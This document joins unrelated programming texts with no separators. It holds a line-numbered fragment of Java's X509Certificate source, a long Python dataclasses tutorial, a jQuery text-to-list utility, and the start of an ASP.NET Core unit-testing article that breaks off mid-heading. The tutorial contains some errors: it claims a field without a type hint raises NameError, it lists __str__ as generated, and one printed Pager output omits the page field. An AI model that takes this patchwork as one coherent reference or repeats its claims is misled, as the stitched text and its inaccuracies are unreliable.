* should override this method with a correct implementation. 600 * 601 * @return an immutable {@code Collection} of subject alternative 602 * names (or {@code null}) 603 * @throws CertificateParsingException if the extension cannot be decoded 604 * @since 1.4 605 */ 606 public Collection<List<?>> getSubjectAlternativeNames() 607 throws CertificateParsingException { 608 return X509CertImpl.getSubjectAlternativeNames(this); 609 } 610 611 /** 612 * Gets an immutable collection of issuer alternative names from the 613 * {@code IssuerAltName} extension, (OID = 2.5.29.18). 614 * <p> 615 * The ASN.1 definition of the {@code IssuerAltName} extension is: 616 * <pre> 617 * IssuerAltName ::= GeneralNames 618 * </pre> 619 * The ASN.1 definition of {@code GeneralNames} is defined 620 * in {@link #getSubjectAlternativeNames getSubjectAlternativeNames}. 621 * <p> 622 * If this certificate does not contain an {@code IssuerAltName} 623 * extension, {@code null} is returned. 
Otherwise, a 624 * {@code Collection} is returned with an entry representing each 625 * {@code GeneralName} included in the extension. Each entry is a 626 * {@code List} whose first entry is an {@code Integer} 627 * (the name type, 0-8) and whose second entry is a {@code String} 628 * or a byte array (the name, in string or ASN.1 DER encoded form, 629 * respectively). For more details about the formats used for each 630 * name type, see the {@code getSubjectAlternativeNames} method. 631 * <p> 632 * Note that the {@code Collection} returned may contain more 633 * than one name of the same type. Also, note that the returned 634 * {@code Collection} is immutable and any entries containing byte 635 * arrays are cloned to protect against subsequent modifications. 636 * <p> 637 * This method was added to version 1.4 of the Java 2 Platform Standard 638 * Edition. In order to maintain backwards compatibility with existing 639 * service providers, this method is not {@code abstract} 640 * and it provides a default implementation. Subclasses 641 * should override this method with a correct implementation. 642 * 643 * @return an immutable {@code Collection} of issuer alternative 644 * names (or {@code null}) 645 * @throws CertificateParsingException if the extension cannot be decoded 646 * @since 1.4 647 */ 648 public Collection<List<?>> getIssuerAlternativeNames() 649 throws CertificateParsingException { 650 return X509CertImpl.getIssuerAlternativeNames(this); 651 } 652 653 /** 654 * Verifies that this certificate was signed using the 655 * private key that corresponds to the specified public key. 656 * This method uses the signature verification engine 657 * supplied by the specified provider. Note that the specified 658 * Provider object does not have to be registered in the provider list. 659 * 660 * This method was added to version 1.8 of the Java Platform Standard 661 * Edition. In order to maintain backwards compatibility with existing 662 * service providers, this method is not {@code abstract} 663 * and it provides a default implementation. 664 * 665 * @param key the PublicKey used to carry out the verification. 666 * @param sigProvider the signature provider. 667 * 668 * @exception NoSuchAlgorithmException on unsupported signature 669 * algorithms. 670 * @exception InvalidKeyException on incorrect key. 671 * @exception SignatureException on signature errors. 672 * @exception CertificateException on encoding errors. 673 * @exception UnsupportedOperationException if the method is not supported 674 * @since 1.8 675 */ 676 public void verify(PublicKey key, Provider sigProvider) 677 throws CertificateException, NoSuchAlgorithmException, 678 InvalidKeyException, SignatureException { 679 String sigName = getSigAlgName(); 680 Signature sig = (sigProvider == null) 681 ? Signature.getInstance(sigName) 682 : Signature.getInstance(sigName, sigProvider); 683 684 try { 685 SignatureUtil.initVerifyWithParam(sig, key, 686 SignatureUtil.getParamSpec(sigName, getSigAlgParams())); 687 } catch (ProviderException e) { 688 throw new CertificateException(e.getMessage(), e.getCause()); 689 } catch (InvalidAlgorithmParameterException e) { 690 throw new CertificateException(e); 691 } 692 693 byte[] tbsCert = getTBSCertificate(); 694 sig.update(tbsCert, 0, tbsCert.length); 695 696 if (sig.verify(getSignature()) == false) { 697 throw new SignatureException("Signature does not match."); 698 } 699 } 700 }
Python Fundamentals: Everything you need to know about dataclasses

Josue Balandrano Coronel. Originally published at rmcomplexity.com.

Python data classes make it super easy to write better classes by automatically implementing handy dunder methods like __init__, __str__ (string representation) or __eq__ (equals, the == operator). Data classes also make it easier to create frozen (immutable) instances, serialize instances, and enforce type hint usage.

The main parts of a data class are:

• The @dataclass decorator, which returns the same defined class but modified
• The field function, which allows for per-field customizations

Note: throughout this article we will be using different variations of this Response class. This class is meant to be a simplified representation of an HTTP response.

How to create a data class

To create a data class all we need to do is use the @dataclass decorator on a custom class, like this:

from dataclasses import dataclass

@dataclass
class Response:
    status: int
    body: str

The previous example creates a Response class with status and body attributes. The @dataclass decorator by default gives us these benefits:

• Automatic creation of the following dunder methods:
1. __init__
2. __repr__
3. __eq__
4. __str__
• Enforcing type hints usage. If a field in a data class is defined without a type hint, a NameError exception is raised.
• @dataclass does not create a new class, it returns the same defined class. This allows anything you could do in a regular class to be valid within a data class.

We can appreciate data classes' benefits by taking a look at the previously defined Response class.

Instance initialization:

>>> resp = Response(status=200, body="OK")

Correct representation of a class:

>>> import logging
>>> logging.basicConfig(level=logging.INFO)
>>> resp = Response(status=200, body="OK")
>>> logging.info(resp)
... INFO:root:Response(status=200, body='OK')

Instance equality:

>>> resp_ok = Response(status=200, body="OK")
>>> resp_500 = Response(status=500, body="Error")
>>> resp_200 = Response(status=200, body="OK")
>>> resp_ok == resp_500
... False
>>> resp_ok == resp_200
... True

Note: we can customize the implementation of each dunder method. We'll see how later in this article.

Field definition

There are two ways of defining a field in a data class.

1. Using type hints and an optional default value:

from dataclasses import dataclass

@dataclass
class Response:
    body: str
    status: int = 200

The previous class can be instantiated by passing only the body value, or both status and body:

>>> import logging
>>> logging.basicConfig(level=logging.INFO)
>>> # Create 200 response
>>> resp_ok = Response(body="OK")
>>> logging.info(resp_ok)
... INFO:root:Response(body='OK', status=200)
>>> # Create 500 response
>>> resp_error = Response(status=500, body="error")
>>> logging.info(resp_error)
... INFO:root:Response(body='error', status=500)

2. Using the field method. This is recommended when there's a need for more fine-grained configuration on a field.
By using the field method we can:

Specify a default value

When using the field method we can specify a default value by passing a default parameter:

from dataclasses import dataclass, field

@dataclass
class Response:
    body: str
    status: int = field(default=200)

In Python it is not recommended to use mutable values as argument defaults. This means it's not a good idea to define a data class like this (the following example is not valid):

from dataclasses import dataclass

@dataclass
class Response:
    status: int
    body: str
    headers: dict = {}

If we could use the previous code, every instance of Response would share the same headers object, and that's not good. Fortunately, data classes help us prevent this by raising an error when something like the example above is used. And if we need to use a mutable object as a default value we can use default_factory. The default_factory value should be a function with no arguments; commonly used functions include dict or list:

from dataclasses import dataclass, field

@dataclass
class Response:
    status: int
    body: str
    headers: dict = field(default_factory=dict)

We can then use this class like so:

>>> import logging
>>> logging.basicConfig(level=logging.INFO)
>>> # Create 200 response
>>> resp = Response(status=200, body="OK")
>>> logging.info(resp)
... INFO:root:Response(status=200, body='OK', headers={})

Note: for mutable default values use default_factory.

Include or exclude fields in automatically implemented dunder methods

By default, every defined field is used in __init__, __str__, __repr__, and __eq__. The field method allows us to specify which fields are used when implementing the following dunder methods:

__init__

from dataclasses import dataclass, field

@dataclass
class Response:
    body: str
    headers: dict = field(init=False, default_factory=dict)
    status: int = 200

This data class will implement an __init__ method like this one:

def __init__(self, body: str, status: int = 200):
    self.body = body
    self.status = status
    self.headers = dict()

This version of the Response class will not allow for a headers value on initialization. Here's how we could use it:

>>> import logging
>>> logging.basicConfig(level=logging.INFO)
>>> # Create 200 response
>>> resp = Response(body="Success")
>>> logging.info(resp)
... INFO:root:Response(body='Success', headers={}, status=200)
>>>
>>> # Passing a headers param on initialization will raise an argument error.
>>> resp = Response(body="Success", headers={})
... TypeError: __init__() got an unexpected keyword argument 'headers'
>>>
>>> # 'headers' is an instance attribute and can be used after initialization.
>>> resp.headers = {"Content-Type": "application/json"}
>>> logging.info(resp)
... INFO:root:Response(body='Success', headers={'Content-Type': 'application/json'}, status=200)

Note: fields that are not used in the __init__ method can also be populated after init using __post_init__.

__repr__ and __str__

from dataclasses import dataclass, field

@dataclass
class Response:
    body: str
    headers: dict = field(repr=False, init=False, default_factory=dict)
    status: int = 200

Now the Response class will not print the value of headers when an instance is printed.
>>> resp = Response(body="Success")
>>> logging.info(resp)
... INFO:root:Response(body='Success', status=200)

__eq__

from dataclasses import dataclass, field

@dataclass
class Response:
    body: str
    headers: dict = field(compare=False, init=False, repr=False, default_factory=dict)
    status: int = 200

This version of the Response class will not take the headers value into consideration when comparing one instance to another:

>>> resp_json = Response(body="Success")
>>> resp_json.headers = {"Content-Type": "application/json"}
>>> resp_xml = Response(body="Success")
>>> resp_xml.headers = {"Content-Type": "application/xml"}
>>> resp_json == resp_xml
... True

Both objects are equal because only the status and body values are considered when checking for equality, not the headers value.

Note: when setting compare to False on a field, it will not be used to automatically implement any comparison methods (__lt__, __gt__, etc...). More on comparisons later.

Add field-specific metadata

We can add metadata to a field. The metadata is a mapping and it's meant to be used by 3rd-party libraries; the data classes implementation does not use field metadata at all.

Note: if you decide to use field-specific metadata, be mindful that other 3rd-party libraries could overwrite any value. It's recommended to use a specific key to avoid collisions.

from dataclasses import dataclass, field
from typing import Any

@dataclass
class Response:
    body: Any = field(metadata={"force_str": True})
    headers: dict = field(init=False, repr=False, default_factory=dict)
    status: int = 200

This Response class assigns a mapping with the key force_str as metadata. The metadata mapping can be used as configuration to force using the string representation of whatever is passed as body. To access a field's metadata the fields method can be used:

>>> from dataclasses import fields
>>> resp = Response(body="Success")
>>> fields(resp)
... (Field(name='body',type=typing.Any,default=<dataclasses._MISSING_TYPE object at 0x7f955a0e97f0>,default_factory=<dataclasses._MISSING_TYPE object at 0x7f955a0e97f0>,init=True,repr=True,hash=None,compare=True,metadata=mappingproxy({'force_str': True}),_field_type=_FIELD), Field(name='headers',type=<class 'dict'>,default=<dataclasses._MISSING_TYPE object at 0x7f955a0e97f0>,default_factory=<class 'dict'>,init=False,repr=False,hash=None,compare=True,metadata=mappingproxy({}),_field_type=_FIELD), Field(name='status',type=<class 'int'>,default=200,default_factory=<dataclasses._MISSING_TYPE object at 0x7f955a0e97f0>,init=True,repr=True,hash=None,compare=True,metadata=mappingproxy({}),_field_type=_FIELD))

The fields method returns a tuple of Field objects. It can be used on an instance or a class. To retrieve the body field we can use a comprehension and next:

>>> body_field = next(
...     (field for field in fields(resp) if field.name == "body"), None
... )
>>> logging.info(body_field)
... INFO:root:Field(name='body',type=typing.Any,default=<dataclasses._MISSING_TYPE object at 0x7f955a0e97f0>,default_factory=<dataclasses._MISSING_TYPE object at 0x7f955a0e97f0>,init=True,repr=True,hash=None,compare=True,metadata=mappingproxy({'force_str': True}),_field_type=_FIELD)
>>> logging.info(body_field.metadata)
...
INFO:root:{'force_str': True}

Customize object initialization

The @dataclass decorator automatically implements an __init__ method. By using __post_init__ we can add custom logic on initialization without having to re-implement __init__:

from dataclasses import dataclass, field
from sys import getsizeof

@dataclass
class Response:
    body: str
    headers: dict = field(init=False, compare=False, default_factory=dict)
    status: int = 200

    def __post_init__(self):
        """Add a Content-Length header on init."""
        self.headers["Content-Length"] = getsizeof(self.body)

When the previous class is instantiated the content length is automatically calculated:

>>> import logging
>>> logging.basicConfig(level=logging.INFO)
>>> # Create 200 response
>>> resp = Response("Success")
>>> logging.info(resp)
... INFO:root:Response(body='Success', headers={'Content-Length': 56}, status=200)

We can also access field-specific metadata in __post_init__:

import json
from dataclasses import dataclass, field, is_dataclass, asdict
from sys import getsizeof
from typing import Any

@dataclass
class Response:
    body: Any = field(metadata={"force_str": True})
    headers: dict = field(init=False, compare=False, default_factory=dict)
    status: int = 200

    def stringify_body(self):
        """Return a string representation of the value in body."""
        body = self.body
        if is_dataclass(body):
            body = asdict(body)
        if isinstance(body, dict):
            return json.dumps(body)
        if not isinstance(body, str):
            return str(body)
        return body

    def __post_init__(self):
        """Custom init logic.

        - Check if body is configured to force value as string
        - Calculate body's length and add corresponding header.
        """
        body_field = self.__dataclass_fields__["body"]
        if body_field.metadata["force_str"]:
            self.body = self.stringify_body()
        self.headers["Content-Length"] = getsizeof(self.body)

And we can use this class like this:

>>> import logging
>>> logging.basicConfig(level=logging.INFO)
>>> # Create 200 response
>>> resp = Response(body={"message": "Success"})
>>> logging.info(resp)
... INFO:root:Response(body='{"message": "Success"}', headers={'Content-Length': 71}, status=200)

The body value is automatically serialized into a string and stored in the class on initialization. The previous example is mainly to show custom initialization logic. In reality you might not want to store the string representation of a response body; instead it's better to make the class serializable.

Note: you can use asdict to transform a data class into a dictionary; this is useful for string serialization.

We can also specify fields which will not be attributes of an instance but will be passed on to the __post_init__ hook, by using dataclasses.InitVar:

import json
from dataclasses import dataclass, field, is_dataclass, asdict, InitVar
from sys import getsizeof
from typing import Any

@dataclass
class Response:
    body: Any
    headers: dict = field(init=False, compare=False, default_factory=dict)
    status: int = 200
    force_body_str: InitVar[bool] = True

    def stringify_body(self):
        """Return a string representation of the value in body."""
        body = self.body
        if is_dataclass(body):
            body = asdict(body)
        if isinstance(body, dict):
            return json.dumps(body)
        if not isinstance(body, str):
            return str(body)
        return body

    def __post_init__(self, force_body_str):
        """Custom init logic.

        - Check if body is configured to force value as string
        - Calculate body's length and add corresponding header.
""" if force_body_str: self.body = self.stringify_body() self.headers["Content-Length"] = getsizeof(self.body) Enter fullscreen mode Exit fullscreen mode We can easily configure if the value of body will be stored as string or not: >>> import logging >>> logging.basicConfig(level=logging.INFO) >>> # Create 200 response where 'body' will be stored as a dict. >>> resp = Response(body={"message": "Success"}, force_body_str=False) >>> logging.info(resp) ... INFO:root:Response(body={'message': 'Success'}, headers={'Content-Length': 232}, status=200) >>> # Create 200 response where 'body' will be stored as a string. >>> resp_str = Response(body={"message": "Success"}) >>> logging.info(resp) ... INFO:root:Response(body='{"message": "Success"}', headers={'Content-Length': 71}, status=200) Enter fullscreen mode Exit fullscreen mode Data classes that we can compare and order By default a data class implements __eq__. We can pass an order boolean argument to the @dataclass decorator to also implement __lt__ (less than), __le__ (less or equal), __gt__ (greater than) and __ge__ (greater or equal). The way these rich comparison methods are implemented take every defined field and compare them in the order they are defined until there's a value that's not equal. from dataclasses import dataclass @dataclass(order=True) class Response: body: str status: int = 200 Enter fullscreen mode Exit fullscreen mode The previous data class can now be compared using >=, <=, > and < operands. The best use case for this is when sorting: >>> resp_ok = Response(body="Success") >>> resp_error = Response(body="Error", status=500) >>> sorted([resp_ok, resp_error]) ... [Response(body='Error', status=500), Response(body='Success', status=200)] Enter fullscreen mode Exit fullscreen mode In this example resp_error goes before resp_ok because the unicode value of E is less than the unicode value of S. Note: implementing rich comparison methods allow us to easily sort objects. The implemented comparison methods will check the value of body, if both are equal it will continue to status. If the class had more fields the rest of the fields would be checked in order until a non-equal value is found. The previous example is valid but it does not make much sense to sort Response objects based on the body and status values. It makes more sense to sort them on the length of the body. We can specify which fields to use in comparison by using the field method: from dataclasses import dataclass, field from sys import getsizeof @dataclass(order=True) class Response: body: str = field(compare=False) status: int = field(compare=False, default=200) _content_length: int = field(compare=True, init=False) def __post_init__(self): """Calculate and store content length on init""" self._content_length = getsizeof(self.body) Enter fullscreen mode Exit fullscreen mode In the previous example we specified which fields are used when implementing comparison methods by passing a boolean compare parameter to the field method. This class will now be sorted by the size of the value of body. We can also judge if an instance is larger than another judging by the size of the value of body. 
>>> resp_ok = Response(body="Success")
>>> resp_error = Response(body="Error", status=500)
>>> sorted([resp_ok, resp_error])
... [Response(body='Error', status=500, _content_length=54), Response(body='Success', status=200, _content_length=56)]
>>> # resp_error is smaller than resp_ok because
>>> # "Error" is smaller than "Success"

One downside of this implementation is that two given instances will be equal as long as the size of the body attribute is the same.

>>> resp_ok = Response(body="Success")
>>> resp_error = Response(body="Failure")
>>> resp_ok == resp_error
... True
>>> # Both instances are equal because "Success" and "Failure" have the same number of characters
>>> # and getsizeof() returns the same size for both strings.

For equality it would be better to also check whether the value of the body attribute is the same:

from dataclasses import dataclass, field
from sys import getsizeof

@dataclass(order=True)
class Response:
    _content_length: int = field(compare=True, init=False)
    body: str = field(compare=True)
    status: int = field(compare=False, default=200)

    def __post_init__(self):
        """Calculate and store content length on init"""
        self._content_length = getsizeof(self.body)

By moving the _content_length field definition above body, the length of the content will be used first for any comparison. We also set body as a compare field. When checking for equality, if the content length is the same, the actual value of body will be checked, making for a better equality check.

>>> resp_ok = Response(body="Success")
>>> resp_error = Response(body="Failure")
>>> resp_ok == resp_error
... False

This also works for sorting, since response instances with the same content length will be sorted by the weight of their characters. Sorting will always yield the same order.

>>> sorted([resp_ok, resp_error])
... [Response(_content_length=56, body='Failure', status=200), Response(_content_length=56, body='Success', status=200)]

Note: the order in which fields are defined matters for comparisons.

Frozen or immutable instances

We can create frozen instances by passing frozen=True to the @dataclass decorator.

from dataclasses import dataclass

@dataclass(frozen=True)
class Response:
    body: str
    status: int = 200

This is helpful when you want to make sure read-only data is not mistakenly modified by your code or by third-party libraries. If you try to modify a value, a FrozenInstanceError exception will be raised:

>>> resp_ok = Response(body="Success")
>>> resp_ok.body = "Done!"
... dataclasses.FrozenInstanceError: cannot assign to field 'body'

In Python we cannot really have immutable objects. If you make an effort, you can still modify a frozen data class instance:

>>> import logging
>>> logging.basicConfig(level=logging.INFO)
>>> # Check values of 'resp_ok'
>>> logging.info(resp_ok)
... INFO:root:Response(body='Success', status=200)
>>>
>>> object.__setattr__(resp_ok, "body", "Done!")
>>> # We have modified a "frozen" instance
>>> logging.info(resp_ok)
... INFO:root:Response(body='Done!', status=200)

This is unlikely to happen, but it's worth knowing.

Note: use a frozen data class when working with read-only data to avoid unwanted side-effects.
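The same object.__setattr__ escape hatch is what lets a frozen data class compute a field during initialization. A minimal sketch (my own example, not from the original article):

from dataclasses import dataclass, field
from sys import getsizeof

@dataclass(frozen=True)
class Response:
    body: str
    status: int = 200
    _content_length: int = field(init=False)

    def __post_init__(self):
        # A plain `self._content_length = ...` would raise FrozenInstanceError,
        # so bypass the frozen __setattr__ explicitly:
        object.__setattr__(self, "_content_length", getsizeof(self.body))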
Note: in a frozen data class, __post_init__ still runs, but it cannot assign to fields directly; it has to go through object.__setattr__, as in the sketch above.

Replacing or updating an object instance

The dataclasses module also offers a replace function, which creates a new instance of the same class. Any updates are passed as parameters:

from dataclasses import dataclass, replace

@dataclass(frozen=True)
class Response:
    body: str
    status: int = 200

>>> import logging
>>> logging.basicConfig(level=logging.INFO)
>>> # Create 200 response
>>> resp_ok = Response(body="Success")
>>> logging.info(resp_ok)
... INFO:root:Response(body='Success', status=200)
>>> # Replace instance
>>> resp_ok = replace(resp_ok, body="OK")
>>> logging.info(resp_ok)
... INFO:root:Response(body='OK', status=200)

The value of body is updated and the value of status is copied over. Any reference to resp_ok now points to the new, updated object.

Note: using replace ensures __init__ and __post_init__ are run with the updated values.

Adding class attributes

In Python a class can have class attributes. The differences from instance attributes are mainly these two:

1. Class attributes are defined outside __init__.
2. Every instance of the class shares the same value of a class attribute.

We can define class attributes in a data class by using the pseudo-field typing.ClassVar:

from dataclasses import dataclass, field
from typing import ClassVar, Any
from sys import getsizeof
from collections.abc import Callable

@dataclass
class Response:
    body: str
    _content_length: int = field(default=0, init=False)
    status: int = 200
    getsize_fun: ClassVar[Callable[[Any], int]] = getsizeof

    def __post_init__(self):
        """Calculate content length by using getsize_fun"""
        self._content_length = self.getsize_fun(self.body)

In this version of Response we can specify the function used to calculate the content's size. By default sys.getsizeof is used.

from functools import reduce

def calc_str_unicode_weight(self, string: str):
    """Calculates string weight by adding each character's Unicode value"""
    return reduce(lambda weight, char: weight + ord(char), string, 0)

@dataclass
class ResponseUnicode(Response):
    getsize_fun: ClassVar[Callable[[Any], int]] = calc_str_unicode_weight

>>> import logging
>>> logging.basicConfig(level=logging.INFO)
>>> # Create 200 response, using getsizeof to calculate content length
>>> resp_ok = Response(body="Success")
>>> logging.info(resp_ok)
... INFO:root:Response(body='Success', _content_length=56, status=200)
>>> # Override the function used when calculating content length
>>> resp_ok_unicode = ResponseUnicode(body="Success")
>>> logging.info(resp_ok_unicode)
... INFO:root:ResponseUnicode(body='Success', _content_length=729, status=200)

To override the function used to calculate the content length, we subclass Response and assign the function we want as getsize_fun. (Why does calc_str_unicode_weight take a self parameter? A plain Python function stored as a class attribute becomes a bound method when accessed through an instance, so self is passed implicitly; built-ins like sys.getsizeof are not descriptors, so they are not bound.)

Note: fields that use ClassVar are not used in data class machinery like __init__ or the equality and comparison dunder methods.

Inheritance in data classes

When using inheritance with data classes, fields are merged, meaning child classes can overwrite field definitions. Everything else works the same, since the @dataclass decorator returns a plain, regular Python class.
from dataclasses import dataclass, field

@dataclass
class Response:
    body: str
    status: int
    headers: dict

@dataclass
class JSONResponse(Response):
    status: int = 200
    headers: dict = field(default_factory=dict, init=False)

    def __post_init__(self):
        """Automatically add Content-Type header"""
        self.headers["Content-Type"] = "application/json"

In the previous example the parent class Response defines the basic fields, and the child class JSONResponse overwrites the headers field and sets a default value for the status field.

>>> import json
>>> import logging
>>> logging.basicConfig(level=logging.INFO)
>>> # Create 200 response
>>> resp_ok = JSONResponse(body=json.dumps({"message": "OK"}))
>>> logging.info(resp_ok)
... INFO:root:JSONResponse(body='{"message": "OK"}', status=200, headers={'Content-Type': 'application/json'})

Object hash

The @dataclass decorator will automatically implement the __hash__ method if the parameters frozen and eq are both True. frozen is False by default and eq is True by default.

from dataclasses import dataclass

@dataclass(frozen=True)
class Response:
    body: str
    status: int = 200

We can now use any instance of this class as a key in a dict or as a member of a set. For instance, we can create a mapping of responses to users:

>>> import logging
>>> logging.basicConfig(level=logging.INFO)
>>> # Create 200 response
>>> resp_ok = Response(body="Success")
>>> # Create 500 response
>>> resp_error = Response(body="Error", status=500)
>>> # Create a mapping of response -> usernames
>>> responses_to_users = {
...     resp_ok: ["j_mccain", "a_perez"],
...     resp_error: ["d_dane", "b_rodriguez"]
... }
>>> logging.info(responses_to_users[resp_ok])
... INFO:root:['j_mccain', 'a_perez']

We can force a __hash__ implementation even if we don't set frozen and eq to True by passing unsafe_hash=True to the @dataclass decorator. This should only be used if you are 100% sure you need the functionality.

A use case for data classes

Throughout this article we've made different updates to a Response class which represents a simplified HTTP response object. Let's put everything together. For simplicity we're going to write every class and function in the same file; in reality these should be spread out into sensible modules.

Note: this is still not a 100% real HTTP response class, but it has enough information to show how we can use data classes.

import logging
from sys import getsizeof
from typing import ClassVar, Any, Dict, Optional, cast
from collections.abc import Callable
from dataclasses import dataclass, field, InitVar, asdict

logging.basicConfig(level=logging.DEBUG)

class APIException(Exception):
    """Custom API exception."""
    def __init__(self, message: str, **kwargs):
        self.message = message
        self.data: Dict[str, Any] = kwargs

class PositiveNumberValidator:
    """Descriptor to make sure a value is a positive number"""
    def __set_name__(self, owner, name):
        self.name = f"_{name}"

    def __get__(self, obj, objtype=None):
        return getattr(obj, self.name)

    def __set__(self, obj, value):
        self.validate(value)
        setattr(obj, self.name, value)

    def validate(self, value):
        if not isinstance(value, int):
            raise AttributeError(f"value of '{self.name}' must be a number")
        if value < 0:
            raise AttributeError(f"value of '{self.name}' must be a positive number")

@dataclass(eq=False)
class Pager:
    """Pager class.

    This class is to hold any pager-related data sent in the response.
    The prev and next parameters are meant to be links sent in the 'Link' header.
    """
    page: int = cast(int, PositiveNumberValidator())
    prev: str = ""
    next: str = ""

@dataclass(order=True)
class HTTPResponse:
    """Parent HTTPResponse.

    This class can:
    1. Be ordered and compared by its content size and body using regular operators.
    2. Receive a 'content_type' string to be used as a header value.
    3. Have its headers updated directly, like a regular dictionary.
    4. Customize the function used to calculate Content-Length.
    """
    _content_length: int = field(init=False)
    body: Any
    pager: Optional[Pager] = field(default=None, compare=False)
    headers: dict = field(default_factory=dict, init=False, compare=False)
    status: int = field(default=200, compare=False)
    content_type: InitVar[str] = "text/html"
    getsize_fun: ClassVar[Callable[[Any], int]] = getsizeof

    def __post_init__(self, content_type):
        """Automatically calculate header values."""
        self._content_length = self.getsize_fun(self.body)
        self.headers["Content-Length"] = self._content_length
        self.headers["Content-Type"] = content_type

@dataclass(frozen=True)
class JSONBody:
    """Class to hold data sent in a JSON response.

    This class is immutable to avoid any unwanted modification of data.
    """
    message: str
    data: dict

    @classmethod
    def from_exc(cls: type, exc: APIException):
        """Initializes a JSONBody object from an exception."""
        return cls(message=str(exc), data=getattr(exc, "data", {}))

@dataclass
class JSONResponse(HTTPResponse):
    """Class to represent a JSON response. Child of HTTPResponse."""
    body: JSONBody
    content_type: InitVar[str] = "application/json"

Here, we created a parent class HTTPResponse which holds the basic data needed to send an HTTP response. Then we created a JSONResponse class which inherits from HTTPResponse and overwrites the body and content_type attributes. Overwriting these attributes allows us to specify a different default content type and a different type for the body.

There is also a Pager class which is used to hold any data related to pagination that's sent in the response. The Pager class uses a descriptor to validate that page is always a positive number. And we also have JSONBody, which can be initialized by passing a message and a dictionary for data, or by passing an APIException instance. APIException is a custom exception we created to store an exception message along with some data related to said exception.

Here are some basic examples of how we can use these classes:

1. We can create a JSONResponse just by passing a JSONBody instance:

>>> import logging
>>> logging.basicConfig(level=logging.INFO)
>>> body = JSONBody(message="Success", data={"values": ["value1", "value2"]})
>>> resp = JSONResponse(body)
>>> logging.info("resp: %s", resp)
... INFO:root:resp: JSONResponse(_content_length=48, body=JSONBody(message='Success', data={'values': ['value1', 'value2']}), pager=None, headers={'Content-Length': 48, 'Content-Type': 'application/json'}, status=200)

This is already a powerful class, and the code needed to implement it is quite short.

2. We can also pass a Pager instance to make it a more robust response:

>>> pager = Pager(1, prev="?prev=0", next="?next=2")
>>> resp = JSONResponse(body, pager=pager)
>>> logging.info("resp: %s", resp)
... INFO:root:resp: JSONResponse(_content_length=48, body=JSONBody(message='Success', data={'values': ['value1', 'value2']}), pager=Pager(prev='?prev=0', next='?next=2'), headers={'Content-Length': 48, 'Content-Type': 'application/json'}, status=200)

3.
We can easily convert data classes to dictionaries or tuples, even when using nested data classes:

>>> from dataclasses import asdict, astuple
>>> logging.info("serialized resp: %s", asdict(resp))
... INFO:root:serialized resp: {'_content_length': 48, 'body': {'message': 'Success', 'data': {'values': ['value1', 'value2']}}, 'pager': {'prev': '?prev=0', 'next': '?next=2'}, 'headers': {'Content-Length': 48, 'Content-Type': 'application/json'}, 'status': 200}
>>> logging.info("resp as tuple: %s", astuple(resp))
... INFO:root:resp as tuple: (48, ('Success', {'values': ['value1', 'value2']}), ('?prev=0', '?next=2'), {'Content-Length': 48, 'Content-Type': 'application/json'}, 200)

With a more realistic example we can see the strengths and weaknesses of data classes.

Benefits of using data classes

1. We can create powerful classes with less code.
2. Type hints are spelled out for every class and instance attribute.
3. We can customize how special dunder methods are implemented.
4. We can use data classes in the same way we use regular classes. In the previous example we used descriptors and class methods without an issue.
5. Inheritance can be used to make data classes easier to use.
6. It's easier to serialize instances to dictionaries or tuples.
7. We can mix regular classes and data classes.

Disadvantages of using data classes

1. When creating data classes that can be compared and ordered, the order in which you define the fields matters, and readability can take a hit because of this. It is recommended to try to separate fields by type: in the HTTPResponse class we have first private attributes, then instance attributes, then init-only parameters, and finally class attributes.
2. Field definition order also matters when using default values. Since __init__'s arguments are generated in the same order the fields are defined, we have to first define attributes without default values and then attributes with default values.
3. When using frozen=True we cannot assign values in __post_init__ (without resorting to object.__setattr__).
4. We have to manually optimize attribute access if needed, meaning adding __slots__. Real Python has a great example of this.

I hope this article sheds some light on how and when to use data classes. If you like it, please follow this blog and make sure to follow me on twitter.
jQuery Convert Text to HTML List – $.stringToList

This is a little jQuery utility function I wrote which simply converts text (i.e. a long string) into an HTML list. It has a couple of settings for choosing conversion to an Ordered List (OL) or an Unordered List (UL). The delimiter for each item in the list is a full stop.

(The original post showed Before and After screenshots of the text and the generated list here.)

jQuery.stringToList()

/*
 * $.stringToList
 * jQuery function to convert a block of text into an HTML list.
 * @requires: full stops after each sentence to match list elements
 * @param: list type: ul or ol
 * Usage: $('#inclusions').stringToList('ul');
 * Author: Sam Deering
 */
$.fn.extend(
{
    stringToList: function(listType)
    {
        var sentenceRegex = /[a-z0-9,'‘- ]+/igm,
            htmlList = '<' + listType + '>';
        $.each($(this).html().match(sentenceRegex), function(i, v)
        {
            /* Remove blank elements */
            if (v && (/[a-z0-9]+/igm.test(v)) && v != 'strong')
            {
                htmlList += '<li>' + v + '</li>';
            }
        });
        htmlList += '</' + listType + '>';
        $(this).html(htmlList);
    }
});

/* Convert text to html list */
$('#inclusions').stringToList('ul');

Custom Namespace Version

/*
 * $.stringToList - jQuery function to convert a block of text into an HTML list.
 * @requires: full stops after each sentence to match list elements
 * @param: list type: ul or ol
 * Usage: NAMESPACE.stringToList($('#inclusions'), 'ul');
 * Author: Sam Deering
 */
stringToList: function(textContainer, listType)
{
    var sentenceRegex = /[a-z0-9,'‘- ]+/igm,
        htmlList = '<' + listType + '>';
    $.each(textContainer.html().match(sentenceRegex), function(i, v)
    {
        /* Remove blank elements */
        if (v && (/[a-z0-9]+/igm.test(v)) && v != 'strong')
        {
            htmlList += '<li>' + v + '</li>';
        }
    });
    htmlList += '</' + listType + '>';
    textContainer.html(htmlList);
}

/* Convert text to html list */
NAMESPACE.stringToList($('#inclusions'), 'ul');
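Since the original screenshots are gone, here is a hypothetical before/after of the markup (my own illustration, not from the original post), assuming the default 'ul' list type:

<!-- Before -->
<div id="inclusions">Return flights. Hotel transfers. Four nights accommodation.</div>

<!-- After running $('#inclusions').stringToList('ul') -->
<div id="inclusions"><ul><li>Return flights</li><li> Hotel transfers</li><li> Four nights accommodation</li></ul></div>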
Unit testing a custom middleware in ASP.NET Core with Interface

Harshal Suthar · Posted on DEV Community · Originally published at ifourtechnolab.com

What is a unit test?

A unit test is a type of testing that takes the smallest piece of code that can be logically isolated in a program and verifies that it works properly. Modern unit testing lives in frameworks like JUnit, or in testing tools like TestComplete. You will also find SUnit, the mother of all unit testing frameworks, created by Kent Beck.

How do the tests look?

A unit can be almost anything you want it to be: a line of code, a method, or a class. Smaller tests give you a more detailed view of how your code is performing. There is also the practical aspect that when you test very small units, your tests can run fast, like so many tests in a second fast.

Consider this sample code:

def divider(x, y)
    return x / y
end

This example is simple, but it gives you an idea of what I mean by small. Small tests also have the benefit of making it harder to cross systems, from your code into a database or a 3rd-party system. There is nothing wrong with crossing systems, but it has consequences, like gradually slowing your tests until the test suite takes hours to run.

What is middleware?

